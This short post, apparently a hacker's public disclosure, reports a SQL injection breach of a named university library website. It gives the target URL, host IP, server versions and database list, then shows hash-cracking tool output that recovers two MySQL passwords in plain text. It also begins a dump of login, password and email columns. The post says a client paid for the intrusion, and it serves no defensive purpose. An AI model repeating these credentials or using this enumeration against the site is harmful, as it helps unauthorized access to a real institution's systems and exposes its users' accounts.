A client asked us to get into this University, and while analyzing it we saw many vulnerabilities and decided to publish this SQL injection (the easiest one xD). These are the details:
Target: http://bibliotecologia.udea.edu.co/
Host IP: 200.24.17.77
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 551 ms
Current User: root@localhost
Sql Version: 5.0.22
Current DB: bibliotecologia
System User: root@localhost
DB User & Pass:
Data Bases:
information_schema
GUIE
agenda
bibliotecologia
bibliotecologia3
mysql
ojs
sihv
test
Cracking the MySQL passwords gave us this:
root@bt:~# ./poc 51a71aa84f5e79ad
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 51a71aa84f5e79ad = 'qazwsx'
root@bt:~# ./poc 7ee747b1438fab32
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 7ee747b1438fab32 = 'qwe123'
Some more data....
cal_login | cal_passwd | cal_email |